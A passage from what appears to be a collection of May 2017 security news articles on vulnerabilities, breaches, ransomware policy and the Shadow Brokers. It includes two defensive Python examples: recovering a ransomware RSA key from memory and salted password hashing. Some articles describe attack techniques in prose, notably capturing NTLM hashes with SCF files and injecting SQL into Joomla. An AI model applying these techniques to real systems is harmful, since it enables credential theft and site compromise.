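    d = pow(e, -1, (p - 1) * (q - 1))
    return {"n": n, "e": e, "d": d, "p": p, "q": q}


def build_memory_image(prime, byte_len, total_len=4096, offset=None):
    """Constructed stand-in for a process heap: random bytes with one prime
    embedded little-endian (the byte order assumed here for CryptoAPI's
    multiprecision integers) at `offset`, as if it had never been wiped."""
    if offset is None:
        offset = secrets.randbelow(total_len - byte_len)
    image = bytearray(secrets.token_bytes(total_len))
    image[offset:offset + byte_len] = prime.to_bytes(byte_len, "little")
    return bytes(image)


def scan_for_prime_factor(memory, n, byte_len):
    """Slide a window over the image; any window value that divides the public
    modulus n is one of its primes. Returns (offset, prime) or None."""
    for off in range(len(memory) - byte_len + 1):
        cand = int.from_bytes(memory[off:off + byte_len], "little")
        if 1 < cand < n and n % cand == 0:
            return off, cand
    return None


def rebuild_private_exponent(n, e, p):
    """Given n = p*q and one prime, recover q, phi(n) and d."""
    q = n // p
    if p * q != n:
        raise ValueError("p does not divide n")
    return pow(e, -1, (p - 1) * (q - 1))


def recover_file_key(enc_file_key, n, d):
    """Undo the RSA encryption of a per-file key once d is rebuilt."""
    return pow(enc_file_key, d, n)


if __name__ == "__main__":
    key = generate_rsa(512)
    plen = key["p"].bit_length() // 8      # 32 bytes for a 256-bit prime
    image = build_memory_image(key["p"], plen)
    off, prime = scan_for_prime_factor(image, key["n"], plen)
    d = rebuild_private_exponent(key["n"], key["e"], prime)
    file_key = secrets.randbelow(key["n"])
    wrapped = pow(file_key, key["e"], key["n"])
    print(off, recover_file_key(wrapped, key["n"], d) == file_key)
```

The scan is why the "do not reboot" advice matters: the candidate window has to survive in the same process's memory, and a zeroed or reused page yields no divisor of n, which the `scan_for_prime_factor` call on an all-zero image shows. A real recovery tool also needs the public key (read from the ransomware's dropped key file) and the full process memory rather than a constructed buffer.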


Cisco Fixes Severe Flaws in Prime Collaboration Product

19.5.2017 securityweek Vulnerebility
Cisco has released updates for its Prime Collaboration Provisioning software to address critical and high severity vulnerabilities that can be exploited remotely without authentication.

The flaws were reported to Cisco by Andrea Micalizzi (aka rgod) through Trend Micro’s Zero Day Initiative (ZDI). Micalizzi, one of ZDI’s top contributors, was credited on Wednesday by the networking giant for finding a total of five vulnerabilities in its Prime Collaboration Provisioning product, which provides a web-based interface for managing Cisco communication services.

The most serious of the flaws, rated critical and tracked as CVE-2017-6622, allows a remote, unauthenticated attacker to bypass authentication and execute arbitrary commands with root privileges.

“The vulnerability is due to missing security constraints in certain HTTP request methods, which could allow access to files via the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted application,” Cisco said in its advisory.

Micalizzi also discovered a high severity information disclosure vulnerability (CVE-2017-6621) in the Prime Collaboration Provisioning software. The weakness can be exploited by a remote attacker, via specially crafted HTTP requests, to obtain information that can be useful in the reconnaissance phase of an attack.

Users have been advised to update the software to versions 11.6 and 12.1 or later to address these vulnerabilities.

Cisco has also published advisories describing medium severity directory traversal vulnerabilities found by the researcher in the Prime Collaboration Provisioning software. These bugs can be leveraged to view and delete files from the system, but they are considered less severe as they can only be exploited by an authenticated attacker.

Cisco said there was no evidence that any of these flaws had been exploited in the wild.

Cisco published nearly two dozen advisories on Wednesday, but most of them cover medium severity issues. There are only two other advisories describing high severity flaws, including a directory traversal that allows a remote attacker to read files from the Cisco TelePresence IX5000 Series filesystem.

A privilege escalation vulnerability in the Cisco Policy Suite (CPS) software has also been rated high severity, but it can only be exploited by an authenticated, local attacker.


Researchers Disclose Unpatched WD TV Media Player Flaws

19.5.2017 securityweek Vulnerebility
Researchers have disclosed several potentially serious vulnerabilities affecting the WD TV Media Player from Western Digital. The vendor has been aware of the flaws since January, but patches have yet to be released.

In March, researchers from Securify, SEC Consult and Exploitee.rs disclosed multiple vulnerabilities identified in WD’s My Cloud storage devices. However, the My Cloud devices were not the only WD products analyzed by SEC Consult.

The company published an advisory on Thursday describing a total of eight security holes affecting the WD TV Media Player, a device that allows users to access media content from a computer, USB drive, network storage device or the Internet directly on their TV.

“By combining the vulnerabilities documented in this advisory an attacker can fully compromise a network which has the WDTV Media Player appliance installed by using it as a jump-host to aid in further attacks,” SEC Consult warned in its advisory.

One flaw discovered by experts is an arbitrary file upload issue that can be exploited to upload files to the web server without authentication. They also found a local file inclusion vulnerability that can be leveraged to execute the previously uploaded file. This can lead to remote code execution if the attacker uploads a malicious PHP script.

Researchers also determined that all devices are shipped with the same private key in the firmware, the web server is unnecessarily running with root privileges, the login page (which requires only a password) is not protected against brute-force attacks, and the full path of the web directory is exposed. The product is also affected by a SQL injection flaw which, in the worst case scenario, can be exploited to create a backdoor on the web server.

Some of the vulnerabilities can be exploited directly from the Internet if the device’s interface is configured for Web access. However, since cross-site request forgery (CSRF) protection is missing, an attacker can also exploit the flaws remotely by getting the targeted user to click on a malicious link.

SEC Consult found these flaws in version 1.03.07 of the firmware, but believes earlier versions are likely affected as well. The weaknesses were reported to the vendor in mid-January at the same time as the issues affecting My Cloud storage devices, but they remain unpatched. The security firm said the last firmware update for the WD TV Media Player was released in April 2016.

SEC Consult has made public some technical details, but the company will not release any proof-of-concept (PoC) code until patches become available.

SecurityWeek has reached out to WD for comment, but the company had not responded by the time of publication.


Google Chrome Bug Leads to Windows Credential Theft

19.5.2017 securityweek Vulnerebility
An issue with the manner in which Google Chrome and Windows handle specific file types can lead to credential theft even on up-to-date systems, a DefenseCode researcher has discovered.

While previous research on the leak of authentication credentials using Windows’ Server Message Block (SMB) file sharing protocol focused only on attacks involving Internet Explorer and Edge, DefenseCode’s Bosko Stankovic discovered that even the most popular browser out there can be used as an attack vector.

In a paper titled Stealing Windows Credentials Using Google Chrome (PDF), Stankovic explains that the attack abuses Chrome’s default configuration, in which the browser automatically downloads files that it deems safe. What’s more, it doesn’t even prompt the user for a download location, but uses the configured default location instead.

What this means is that the browser could download malicious files that it deems safe and save them to disk without the user’s knowledge. While most files would require some sort of user interaction to perform malicious operations on the system, there are file types that don’t, and an attacker could exploit these to compromise even systems with the latest patches installed.

One of these file types, the security researcher says, is Windows Explorer Shell Command File or SCF (.scf). Although not well-known, this file type goes back as far as Windows 98, and was primarily used as a Show Desktop shortcut in Windows 98/ME/NT/2000/XP.

“It is essentially a text file with sections that determine a command to be run (limited to running Explorer and toggling Desktop) and an icon file location,” the researcher explains.

The same as with shortcut LNK files, the icon location is automatically resolved when the SCF file is shown in Explorer, and attackers are known to have abused this feature by setting an icon location to a remote SMB server in order to abuse the Windows automatic authentication feature when accessing services like remote file shares.

Ever since Stuxnet, Chrome sanitizes LNK files by forcing a .download extension, but doesn’t do the same when SCF files are involved. Because of that, SCF files can be used to trick Windows into an authentication attempt to a remote SMB server. Only two lines of code are needed to conduct such an attack.

“Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the ‘icon’,” Stankovic notes.

The remote SMB server can be set to capture the victim's username and NTLMv2 password hash for offline cracking, or can relay the connection to an external service that accepts the same kind of authentication in an attempt to impersonate the victim without ever knowing the password.

“It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, a file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to the inconspicuous nature of attacks using SCF files,” the researcher explains.

To successfully exploit this attack vector, an actor would simply need to entice users into accessing a website (the attack works even on fully updated Google Chrome and Windows).

The impact of password theft could be dire on enterprise environments (especially if the attack victim is a privileged user) or for Active Directory domains (corporate, government and other networks), where the password theft could lead to escalating internal network breaches.

On Windows 8/10 machines using a Microsoft Account (MSA) instead of a local account, the attack would result in the compromise of all Microsoft services that are integrated with the MSA Single sign-on (SSO). Password reuse could lead to the compromise of accounts unrelated to MSA as well.

“In order to disable automatic downloads in Google Chrome, the following changes should be made: Settings -> Show advanced settings -> check the Ask where to save each file before downloading option. Manually approving each download attempt significantly decreases the risk of NTLMv2 credential theft attacks using SCF files,” the researcher says.


PATCH Act: A New Bill Designed to Prevent Occurrences Like WannaCrypt

19.5.2017 securityweek Ransomware
Following the worldwide WannaCrypt ransomware attack that leveraged the EternalBlue exploit developed by and stolen from the NSA, Microsoft's chief legal officer called for governments to stop stockpiling 0-day exploits. His arguments are morally appealing but politically difficult.

Now, however, he has partial support from a bi-partisan group of lawmakers: Senators Brian Schatz (D-Hawaii), Ron Johnson (R-Wis.), and Cory Gardner (R-Colo.) and U.S. Representatives Ted Lieu (D-Calif.) and Blake Farenthold (R-Texas). Schatz announced yesterday that they had introduced the 'Protecting Our Ability to Counter Hacking Act of 2017' -- the PATCH Act.

Its purpose is to establish a Vulnerability Equities Review Board with permanent members including the Secretary of Homeland Security, the Director of the FBI, the Director of National Intelligence, the Director of the CIA, the Director of the NSA, and the Secretary of Commerce -- or in each case the designee thereof.

Its effect, however, will be to seek a compromise between the moral requirement for the government to disclose vulnerabilities (Microsoft's Digital Geneva Convention), and the government's political expediency in stockpiling vulnerabilities for national security and deterrence purposes.

In a statement issued yesterday, Schatz wrote, "Striking the balance between U.S. national security and general cybersecurity is critical, but it's not easy. This bill strikes that balance. Codifying a framework for the relevant agencies to review and disclose vulnerabilities will improve cybersecurity and transparency to the benefit of the public while also ensuring that the federal government has the tools it needs to protect national security."

The bill does not go so far as to mandate the disclosure of all government 0-day exploits to relevant vendors for patching, but instead requires the Vulnerability Equities Review Board to develop a consistent and transparent process for decision-making. It will create new oversight mechanisms to improve transparency and accountability, while enhancing public trust in the process.

It further requires that "The head of each Federal agency shall, upon obtaining information about a vulnerability that is not publicly known, subject such information to the process established."

In this way, the Vulnerability Equities Review Board not only has oversight of all 0-day vulnerabilities held by the government agencies, it also maintains the controls "relating to whether, when, how, to whom, and to what degree information about a vulnerability that is not publicly known should be shared or released by the Federal Government to a non-Federal entity." That is, whether the public interest requires the vendor be able to patch the vulnerability.

The proposal is already receiving wide approval. Frederick Humphries, Microsoft's VP of US government affairs, tweeted, "We agree with the goals of the PATCH Act and look forward to working w-Sens @RonJohnsonWI @SenCoryGardner @brianschatz, Reps @farenthold @tedlieu to help prevent cyberattacks."

Thomas Gann, chief public policy officer at McAfee, commented: "All governments have to balance national security interests with economic interests. In some cases, governments have an interest in using certain vulnerabilities for intelligence gathering purposes to protect their national interests in ways that make it impossible to disclose. That said, we support the effort by Senators Schatz and Johnson to establish an equitable vulnerabilities review process. This will help facilitate the disclosure of previously unknown vulnerabilities. An improved process will help balance security and economic interests while also enhancing trust and transparency."

Megan Stifel, cybersecurity policy director at Public Knowledge, said, "We thank these legislators for leading this effort to foster greater transparency and accountability on the cybersecurity policy challenge of software and hardware vulnerabilities. We welcome this bill and similar efforts to enhance trust in the internet and internet-enabled devices."


Hackers Steal 17 Million Users' Data From Indian Restaurant App Zomato

19.5.2017 securityweek Incident
India's largest restaurant and food delivery app Zomato announced Thursday that the data of 17 million users had been stolen from its database, including names, email addresses and protected passwords.

The startup said the "hashed" passwords could not be decrypted but recommended users change their login details if they use the same password for other services.

Zomato's chief technology officer Gunjan Patidar said customers' financial information was stored separately from the stolen data and was not compromised by the hack.

"No payment information or credit card data has been stolen/leaked," he said in a statement on Zomato's website, adding they were scanning all possible breaches in their system.

"Your credit card information on Zomato is fully secure, so there's nothing to worry about there."

Those affected had been logged out of the website and app and had their passwords changed "as a precaution", he added.

A report on an online hacker news website carried in local media said the trove of personal data was being auctioned on the dark web for roughly $1,000 by a hacker using an alias.

The hack of the internationally popular e-commerce startup comes on the heels of the "WannaCry" cyberattack, the world's biggest ransomware attack to date.

The culprits demanded payment in virtual currency and threatened to delete files on compromised computers, which numbered in the hundreds of thousands worldwide.

Zomato, which boasts 120 million user visits a month, said it was "plugging any security gaps" and would further enhance its security measures after the database breach.

The company -- a so-called "unicorn" startup because it is valued at more than $1 billion -- was founded in 2008 and it now operates in 23 nations.


Expert Earns $5,000 for Google Intranet Vulnerability

19.5.2017 securityweek Vulnerability
A researcher has earned a $5,000 bounty from Google after finding an information disclosure vulnerability in the login page for the tech giant’s intranet system.

Austria-based researcher David Wind was looking for a vulnerable Google service that could earn him a bug bounty when he came across login.corp.google.com, the login page for Google’s intranet, which is dubbed “MOMA.”

The login page is simple, but it does load a random image from static.corp.google.com every time it’s accessed. After unsuccessful attempts to obtain something from this domain, Wind generated a 404 error page by adding a random string to the URL.

Unlike other error pages displayed by Google to users, this one contained a link named “Re-run query with SFFE debug trace,” which pointed to the same URL with the string “?deb=trace” at the end.

The debugging page included various pieces of information, including server name and internal IP, X-FrontEnd (XFE) HTTP requests, service policies, and information related to Cloud Bigtable, Google's NoSQL big data database service.

“The page did not allow any user interaction and I haven’t found anything to ‘go deeper’ into the system so I reported it right away,” Wind said on his blog.

Google awarded the researcher $5,000 for his findings, which is the maximum amount for information leaks affecting highly sensitive applications.

The vulnerability was reported to Google on January 19 and a short-term fix was implemented some days later. The company told Wind that a permanent fix was rolled out on March 16.

The $5,000 reward earned by the researcher is significant compared to what other bug bounty programs pay, but it's small by Google's standards; the company offers more than $30,000 for remote code execution vulnerabilities.

The company has so far paid out more than $9 million since the launch of its bug bounty program in 2010, including over $3 million last year. The biggest single reward in 2016 was $100,000.


Cyberattacks Prompt Massive Security Spending Surge

19.5.2017 securityweek Cyber
The fight against cyberattacks has sparked exponential growth in global protection spending, with the cyber security market estimated at $120 billion this year, more than 30 times its size just over a decade ago.

But even that massive figure looks set to be dwarfed within a few years, experts said, after ransomware attacks crippled computers worldwide in the past week.

The "global cyber security market was worth $3.5 billion" in 2004, according to a study by cybersecurity research firm Cybersecurity Ventures, but in 2017, "we expect it to be worth more than $120 billion".

In the five years ending in 2021, the firm said it expected worldwide spending on cybersecurity products and services "to eclipse $1 trillion".

"It has clearly been a rapidly increasing market for many years, particularly in the last two or three years," said Gerome Billois, a cyber security expert with consulting firm Wavestone.

Much of the growth will be spurred by massive cyber attacks like the so-called "Wannacry" ransomware that struck targets in dozens of countries, ranging from British hospitals to Russian banks.

In what experts called an unprecedented mass cyberattack using ransomware, more than 200,000 computers around the world were hacked beginning Friday using a security flaw in Microsoft's Windows XP operating system, an older version that was no longer given mainstream tech support by the US giant.

The virus spread quickly because the culprits used a digital code believed to have been developed by the US National Security Agency -- and subsequently leaked as part of a document dump, according to the Moscow-based computer security firm Kaspersky Lab.

The attack blocks computers and puts up images on victims' screens demanding payment of $300 (275 euros) in the virtual currency Bitcoin, saying: "Ooops, your files have been encrypted!"

The massive attack has been a boon for cyber security firms, driving up stock prices of some while others, like six-year-old American start-up Crowdstrike, were able to raise $100 million in one day.

- Ransomware: 'key trend' -

High-profile attacks like WannaCry "drive the market," Ilex International president Laurent Gautier told AFP.

Ransomware attacks represent about 22 percent of all global incidents that NTT Security, an information security and risk management firm, handles for its clients, said Kai Grunwitz, the firm's senior vice president for central Europe.

That number jumps to 56 percent for financial firms.

"So these types of attacks are certainly one of the key trends" driving up spending on computer security systems and tools, Grunwitz said, but "buying more software or hardware products will not fix the problem -- awareness, procedures and a strategy aligned with the specific risk profile are key."

"Nevertheless, the global security market has grown in terms of revenue, and we see a very strong potential for additional growth in products but even more in consulting and managed security services over the next few years."

A still nascent industry just 12 to 13 years ago, the market gradually expanded because of the "digitisation of companies and countries" and the increasing online attacks which publicised the rising digital threat, Billois said.

"The growing wave of ransomware in 2014 created an enormous source of business for security research firms" because "companies were made aware of their vulnerabilities," said security expert Jerome Saiz.

Companies were slow to realise they needed to protect themselves since "the return on investment is impossible to determine," Saiz said, "and we cannot know which attacks we survived and how much they cost".

For large companies, putting in place an IT security strategy can cost tens of millions of dollars, he added.

Some like French telecoms firm Orange choose to bring the security in-house. The telecoms giant bought cyber security firm Lexsi last year.

To better respond to the threat from the other side, smaller security firms have banded together to create alliances, like the group of French companies who formed Hexatrust in 2014.

Either way, software security companies like US anti-virus firm Symantec are reaping the benefits. The company "doubled" its share price in one year, said chief security strategist Laurent Heslault.

But the threat from ransomware is hardly the only danger on the horizon.

The hacking of interconnected appliances and other internet-connected things, the theft of personal and financial data, and hackers engaging in online political campaigns will all drive the market in the coming years.

The biggest troubles however will not come from an attack but a "skills shortage": "a million cyber security jobs worldwide actually remain unfilled," Heslault said.


EU Authorities Fight Back Against "Black Box" ATM Attacks

19.5.2017 securityweek Attack
Europol has announced that a total of 27 related arrests have been made since the ATM black box threat first emerged in 2015. Eleven arrests have been made in France, four in Estonia, three in the Czech Republic and Norway, and two in The Netherlands, Romania and Spain.

A black box attack is a logical attack against cash dispensers. It requires gaining access to the inner workings of the machine, usually, notes Europol, "by drilling holes or melting."

Once access is achieved, the cash dispenser is disconnected from its core working, and connected instead to the hacker's own electronic device -- the so-called black box. The attacker then simply issues the necessary commands to empty the cash dispenser; an act known as 'jackpotting', which bypasses any need for a card or transaction authorization.

Since a black box attack simply empties the whole machine, rather than attempting to extract available cash from an individual account, a single successful attack can potentially steal hundreds of thousands of Euros.

According to Europol, black box attacks have increased dramatically. It quotes a recent report from the European ATM Security Team (EAST) which reports 58 such attacks in 2016 compared to just 15 in 2015. In reality, however, the majority of attacks fail. Although the attacks increased, the related losses fell by 39% from €0.74 million to €0.45 million.

EAST attributes this fall largely to its own work. "While the rise in ATM black box attacks is a concern," said executive director Lachlan Gunn, "we are pleased to note that many of these attacks were not successful. In 2015, to help the industry counter such attacks, our EAST Expert Group on ATM Fraud (EGAF) worked with Europol to produce a document entitled 'Guidance & recommendations regarding logical attacks on ATMs'."

EAST will be leading a breakout session discussing black box attacks at the third global Financial Crime & Security (FCS) Forum, being held in The Hague on 8th/9th June 2017.

Despite the potential for high value individual attacks, black box attacks are rare in comparison to other ATM-related attacks. "ATM related fraud attacks increased by 26%, up from 18,738 in 2015 to 23,588 in 2016," reports EAST. "This rise was mainly driven by a 147% increase in Transaction Reversal Fraud (up from 5,104 to 12,581 incidents). The downward trend for card skimming continues with 3,315 card skimming incidents reported, down 20% from 4,131 in 2015. This is the lowest number of skimming incidents reported since 2005."

Overall, actual fraud-related ATM losses increased only marginally -- up by 2% from €327 million in 2015 to €332 million in 2016.


Zomato Data breach – Nearly 17 million usernames and hashed passwords stolen
19.5.2017 securityaffairs Incident

Nearly 17 million Zomato usernames and hashed passwords have been stolen by hackers; the company suspects it is an insider's job.
Nearly 17 million Zomato usernames and hashed passwords have been stolen by hackers.

Zomato is India's largest online restaurant guide. The company confirmed the data breach, announcing that hackers had stolen the account details of millions of its users.

“about 17 million user records from our database were stolen. The stolen information has user email addresses and hashed passwords.” reads the data breach notification issued by the company.

The company tried to downplay the incident, explaining that hashed passwords are hard to recover in plain text.

“We hash passwords with a one-way hashing algorithm, with multiple hashing iterations and individual salt per password. This means your password cannot be easily converted back to plain text. We however, strongly advise you to change your password for any other services where you are using the same password.” continues the statement.

The reality is quite different: hackers can easily obtain the computational resources needed to crack the passwords.
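As an added example (not code from Zomato or from either article on this breach), this is the scheme the statement above describes, which the securityweek report on the same incident also summarises: a one-way hash with an individual salt per password and a configurable iteration count, plus a local measurement of what each extra iteration costs anyone guessing against a leaked hash. PBKDF2-HMAC-SHA256, the record format and the iteration counts are assumptions; the page does not name Zomato's algorithm or parameters.

```python
import hashlib
import hmac
import os
import time
from typing import Optional

# Constructed example of "one-way hash, multiple iterations, individual salt".
# The algorithm, record format and defaults are assumed, not Zomato's.
ALGORITHM = "pbkdf2_sha256"
DEFAULT_ITERATIONS = 200_000
SALT_BYTES = 16


def hash_password(password: str, iterations: int = DEFAULT_ITERATIONS,
                  salt: Optional[bytes] = None) -> str:
    """Return a self-describing record: algorithm$iterations$salt_hex$digest_hex."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)  # fresh random salt: equal passwords get different records
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the digest with the salt and iteration count stored in the record."""
    algorithm, iterations, salt_hex, digest_hex = record.split("$")
    if algorithm != ALGORITHM:
        raise ValueError(f"unsupported record type: {algorithm}")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    # constant-time comparison so verification timing does not leak digest bytes
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def needs_rehash(record: str, minimum_iterations: int = DEFAULT_ITERATIONS) -> bool:
    """True when a stored record uses fewer iterations than current policy allows.

    Call this after a successful login and re-hash with the current cost, so
    that old, cheaper records do not linger in the database.
    """
    _, iterations, _, _ = record.split("$")
    return int(iterations) < minimum_iterations


def seconds_per_guess(iterations: int, samples: int = 5) -> float:
    """Measure the local cost of one guess at a given iteration count.

    The salt is irrelevant to the cost, so a fixed one is used here; this is a
    benchmark only, never a real record. The iteration count is the defender's
    lever: the cost of every offline guess grows linearly with it.
    """
    salt = b"\x00" * SALT_BYTES
    start = time.perf_counter()
    for _ in range(samples):
        hashlib.pbkdf2_hmac("sha256", b"benchmark-only", salt, iterations)
    return (time.perf_counter() - start) / samples


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print("stored record:", record)
    print("verify correct password:", verify_password("correct horse battery staple", record))
    print("verify wrong password:  ", verify_password("hunter2", record))
    print("needs rehash:", needs_rehash(record))
    for iters in (1_000, 10_000, 100_000):
        print(f"{iters:>7} iterations: {seconds_per_guess(iters) * 1e3:.2f} ms per guess")
```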

Zomato confirmed that the hackers did not access users' financial information, which is stored in a separate database that was not involved in the attack.

“Payment related information on Zomato is stored separately from this (stolen) data in a highly secure PCI Data Security Standard (DSS) compliant vault. No payment information or credit card data has been stolen/leaked,” the company claims.

The company suspects that the hack is an insider’s job.

“Our team is actively scanning all possible breach vectors and closing any gaps in our environment. So far, it looks like an internal (human) security breach – some employee’s development account got compromised,” the company said.

According to the HackRead website, the stolen data is already being offered for sale on a dark web marketplace, where the vendor “nclay” is offering the full dump for BTC 0.5587 (USD 1,001.43).

Zomato customers should change their password and stay vigilant against suspicious emails, as crooks could exploit the stolen data to launch a phishing campaign.


Critical SQL Injection CVE-2017-8917 vulnerability patched in Joomla, update it now!
19.5.2017 securityaffairs Vulnerability

Joomla maintainers released a fix for a critical SQL injection flaw, tracked as CVE-2017-8917, that can be exploited by a remote attacker to hijack websites.
On Wednesday Joomla maintainers released a fix for a critical SQL injection vulnerability, tracked as CVE-2017-8917, that can be easily exploited by a remote attacker to obtain sensitive data and hijack websites.

The vulnerability was reported by Sucuri researcher Marc-Alexandre Montpas; it only affects Joomla 3.7.0 because it is related to a new component introduced in this version.

“The vulnerability is caused by a new component, com_fields, which was introduced in version 3.7. If you use this version, you are affected and should update as soon as possible. This vulnerable component is publicly accessible, which means this issue can be exploited by any malicious individual visiting your site.” reads the analysis published by Sucuri.

“Given the nature of SQL Injection attacks, there are many ways an attacker could cause harm – examples include leaking password hashes and hijacking a logged-in user’s session (the latter results in a full site compromise if an administrator session is stolen).”

According to Montpas, the vulnerability only affects Joomla 3.7 because it’s related to the new com_fields component introduced in this version. The component borrows views from an admin-side component that has the same name. Unfortunately, com_fields is publicly accessible, which means that anyone can exploit the CVE-2017-8917 vulnerability without needing a privileged account on the vulnerable website. An attacker can leverage the flaw to inject nested SQL queries via a specially crafted URL.

Joomla users have been advised to update their installations to the version 3.7.1.

Sucuri has published the technical details of the CVE-2017-8917 vulnerability, so it is likely that threat actors in the wild will start exploiting it in the coming weeks.

“The only administrator view that can be accessed is fields – and this will grab its data from an admin-side model (due to the $config['base_path'] trick we discussed earlier). In this case, the vulnerability we discovered was located in the FieldsModelFields model, in ./administrator/components/com_fields/models/fields.php.” reads the analysis. “So in order to exploit this vulnerability, all an attacker has to do is add the proper parameters to the URL in order to inject nested SQL queries.”


Massive attacks on Joomla installations are a real danger: in October 2016 Joomla released version 3.6.4 to fix two high-severity vulnerabilities, CVE-2016-8870 and CVE-2016-8869, which in combination could be exploited to upload a backdoor and gain complete control of vulnerable Joomla websites.

Experts from Sucuri observed a spike in the number of attacks less than 24 hours after Joomla released patches for the above critical flaws.


Critical SQL Injection Flaw Patched in Joomla

18.5.2017 securityweek Vulnerability
A Joomla update released on Wednesday patches a critical SQL injection vulnerability that can be easily exploited by a remote attacker to obtain sensitive data and hijack websites.

The flaw, discovered by Sucuri researcher Marc-Alexandre Montpas and tracked as CVE-2017-8917, affects Joomla 3.7.0 and it has been addressed with the release of version 3.7.1. This is the only security issue fixed in the latest version.

According to Montpas, the vulnerability only affects Joomla 3.7 because it’s related to a new component introduced in this version. The component in question is com_fields, which borrows views from an admin-side component that has the same name.

Since com_fields is a public-facing component, anyone can exploit the vulnerability without needing a privileged account on the targeted website. An attacker can leverage the flaw to inject nested SQL queries via a specially crafted URL.

“Given the nature of SQL Injection attacks, there are many ways an attacker could cause harm – examples include leaking password hashes and hijacking a logged-in user’s session (the latter results in a full site compromise if an administrator session is stolen),” Montpas warned in a blog post published on Wednesday.

Joomla users have been advised to update their installations as soon as possible. Joomla developers even issued a pre-release security announcement last week to inform users of the “very important security fix.”

While Sucuri has not released a proof-of-concept (PoC) exploit, it has made public the flaw’s technical details. Given that it’s easy to exploit, it would not be surprising to see attacks leveraging this vulnerability in the coming days.

In October 2016, cybercriminals started exploiting a couple of Joomla vulnerabilities in less than 24 hours after they were patched, despite the fact that only limited technical details had been made public. At the time, attackers leveraged the flaws to create rogue user accounts on popular websites.

One year prior, attackers started hacking Joomla websites within hours after the details of a SQL injection vulnerability were disclosed by researchers. A few months later, Joomla developers rushed to patch a zero-day that had been exploited in the wild for at least two days before fixes were released.


People the New Perimeter as Hackers Target Users to Infiltrate Enterprises

18.5.2017 securityweek Hacking
Identity Governance is Key to Improving Security and Compliance

Getting breached is becoming part of doing business. More than half of respondents to a Market Pulse Survey reported that they had suffered two or more breaches during 2016; and 60% expect to be breached in 2017. The average material cost of each breach now stands at more than $4 million.

Identity firm SailPoint commissioned Vanson Bourne to interview 600 senior IT decision-makers at organizations with at least 1,000 employees across Australia, France, Germany, Italy, the United Kingdom and the United States. The key finding is that a lack of visibility into staff actions and access capabilities remains a major problem.

SailPoint was founded in 2005. In 2014, private equity firm Thoma Bravo took a sizeable stake in the company -- thought to be in excess of 'several hundred million'. In February 2017, the Wall Street Journal suggested that SailPoint is currently "laying the groundwork for a possible IPO filing later this year."

While the majority of respondents to the Market Pulse Survey claim to have at least partial visibility into users' access to corporate systems and applications, less than half have full visibility.

Complicating factors continue to be cloud (shadow IT) and mobility (BYOD). Ninety percent of respondents admitted that at least some of their employees procure and use applications without IT or Security oversight or approval. Coupled with the growing use of personal mobile devices, many organizations struggle to know where and by whom their data is being used.

Seventy percent of organizations have embraced BYOD; but less than half have a formal policy around its use for corporate data. The result is a lack of visibility into the whereabouts and indeed content of unstructured data. This exacerbates the industry's two biggest problems: hackers' exploitation of identity to effect, maintain and expand their incursions; and compliance.

People are the new perimeter, suggests SailPoint. "But even as it's widespread knowledge that hackers are targeting users as their doorway into the enterprise, employees aren't helping matters with continued poor password hygiene. 37% of respondents," explains the report, "cited password hygiene as a big factor into their organization's overall risk profile -- with employees either sharing passwords across multiple accounts and systems, not regularly updating or changing their password or not adhering to overall password management policies."

Compliance issues are also growing. The European General Data Protection Regulation (GDPR) requires that companies don't simply protect European PII, but know precisely where it is located. The latter is necessary because GDPR gives EU citizens the right to have their PII removed from organizations' systems -- and that cannot be achieved if the organization doesn't know where it is located (for example, in unstructured data located on staff mobile devices or in shadow IT cloud storage systems).

The survey shows that this concern is particularly strong in Europe, even though the Regulation will apply to any business anywhere in the world that does business with the EU. "Specific to European respondents," notes the report, "compliance bubbled to the top for some regions as a key goal and driver behind identity governance programs." Nearly three-quarters (73%) of UK respondents, and nearly half of German (42%) and French (49%) respondents cited compliance as a reason for improving identity governance.

"There is a silver lining to our report," commented Kevin Cunningham, SailPoint's president and co-founder. "It's clear that now more than ever before, organizations better understand what -- and where -- their risks are, and that identity management can help address those risks. Identity provides that ability to put the detective and preventive controls in place to address all of these exposure points, while automating many identity-related processes to ensure that only the right people have the right access to applications and data at the right time.

He continued, "By putting identity at the center of security and IT operations, these organizations can move their IT teams out of full-time firefighting mode, freeing them up to focus on enabling the business to move forward, confidently and securely."

According to the survey, identity governance is recognized by 97% of respondents as a key solution to these problems; and 55% cite identity as a top security investment priority for 2017. Other benefits are considered to be enhanced security (72% of respondents), a more automated and efficient organization (71%), and business enablement (65%).


Shadow Brokers Promise More Exploits for Monthly Fee

18.5.2017 securityweek BigBrothers
The hacker group calling itself Shadow Brokers claims to possess even more exploits stolen from the NSA-linked Equation Group, and anyone can have them by paying a monthly “membership” fee.

The Shadow Brokers have been in the news over the past days after unknown threat actors leveraged two of the exploits they leaked to deliver WannaCry ransomware to hundreds of thousands of systems worldwide.

The attackers have used an exploit called EternalBlue, which leverages an SMB vulnerability in Windows, to distribute the ransomware without user interaction. Microsoft patched the flaw in March and over the weekend it made available fixes even for outdated versions of Windows.

Some people blamed Shadow Brokers for the devastating WannaCry attacks, arguing that the ransomware could not have spread so easily without the exploits they leaked. Others believe the existence of the vulnerability would have come to light at some point even without them leaking the exploit.

The Shadow Brokers insist that their main goal is to make money and to demonstrate that they are a “worthy opponent” of the Equation Group.

The hackers claimed Microsoft postponed its February security updates to address the EternalBlue and other Eternal exploits. However, they pointed out that they had waited for 30 days after Microsoft rolled out the fixes before releasing the exploits.

The WannaCry attacks led to Microsoft president and chief legal officer Brad Smith renewing his call for governments to stop stockpiling vulnerabilities and disclose them to affected vendors.

Shadow Brokers, however, claims the NSA and Microsoft are “BFFs,” with contracts of “millions or billions of USD each year.” Their other conspiracy theories include an agreement between the NSA and Microsoft over not patching vulnerabilities until they are publicly disclosed, and Microsoft fixing the recent SMB flaw in secret after the NSA lied about the exploits it had been using.

Shadow Brokers claims to possess much more data and exploits, and in June the group plans on launching a subscription-based “service.”

